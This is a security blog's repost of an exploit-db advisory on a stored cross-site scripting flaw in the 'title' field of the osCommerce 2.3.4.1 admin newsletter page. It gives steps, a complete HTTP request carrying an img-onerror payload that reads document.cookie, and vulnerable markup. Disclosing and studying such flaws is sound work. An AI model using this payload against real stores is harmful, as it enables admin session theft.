Categories: Vulnerabilities

osCommerce 2.3.4.1 – ‘title’ Persistent Cross-Site Scripting

Published by
RiSec.Mitch

CVE: N/A

Platform: PHP

Date: 2020-11-25

# Exploit Title: osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting
# Exploit Author: Emre Aslan
# Vendor Homepage: https://www.oscommerce.com/
# Version: 2.3.4.1
# Tested on: Windows & XAMPP

==> Tutorial <==

1- Login to admin panel.
2- Go to the following url. ==> http(s)://(HOST)/catalog/admin/newsletters.php?action=new
3- Enter the XSS payload into the title section and save it.

==> Vulnerable Parameter <==

title= (post parameter)

==> HTTP Request <==

POST /catalog/admin/newsletters.php?action=insert HTTP/1.1
Host: (HOST)
Connection: keep-alive
Content-Length: 123
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://(HOST)/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://(HOST)/catalog/admin/newsletters.php?action=new
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: osCAdminID=s11ou44m0vrasducn78c6sg

module=newsletter&title="><img src=1 href=1 onerror="javascript:alert(document.cookie)"></img>&content=xss

==> Vulnerable Source Code <==

<div id="contentText">
    <table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading">Newsletter Manager</td>
            <td class="pageHeading" align="right"><img src="images/pixel_trans.gif" border="0" alt="" width="57" height="40" /></td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="2">
              <tr class="dataTableHeadingRow">
                <td class="dataTableHeadingContent">Newsletters</td>
                <td class="dataTableHeadingContent" align="right">Size</td>
                <td class="dataTableHeadingContent" align="right">Module</td>
                <td class="dataTableHeadingContent" align="center">Sent</td>
                <td class="dataTableHeadingContent" align="center">Status</td>
                <td class="dataTableHeadingContent" align="right">Action&nbsp;</td>
              </tr>
                  <tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" >
Bookmark
Please login to bookmark Close
Social Comments Box
Share the word, let's increase Cybersecurity Awareness as we know it

This post was last modified on 25 November 2020 10:33 AM

RiSec.Mitch

Just your average information security researcher from Delaware US.

Leave a Comment
Published by
RiSec.Mitch
Tags: cross-site scripting exploit-db osCommerce 2.3

Recent Posts

  • Data Breach News
  • InfoSec News

WH Smith Announces Cyber-Attack: Employee Data Stolen

British high street chain WH Smith has recently revealed that it was hit by a…

2 years ago
  • InfoSec News
  • World Affairs

Voice ID: How Secure is it Really?

As banks worldwide roll out Voice ID as a means of user authentication over the…

2 years ago
  • Cybersecurity Academy
  • InfoSec News

What distinguishes Application Security from API Security?

In the era of digital transformation, cybersecurity has become a major concern for businesses. When…

2 years ago
  • Cybersecurity Academy
  • InfoSec News

The Top 5 Cybersecurity threats facing Businesses Today

In today's digital age, cybersecurity threats have become a significant concern for businesses of all…

2 years ago
  • InfoSec News
  • World Affairs

Enterprise users infected by RIG Exploit Kit thanks to Internet Explorer

The RIG Exploit Kit is currently in the midst of its most productive phase, attempting…

2 years ago
  • Cybersecurity Academy

The Rise and Rise of AI

One of the most transformational technologies of our time, artificial intelligence (AI), has quickly come…

2 years ago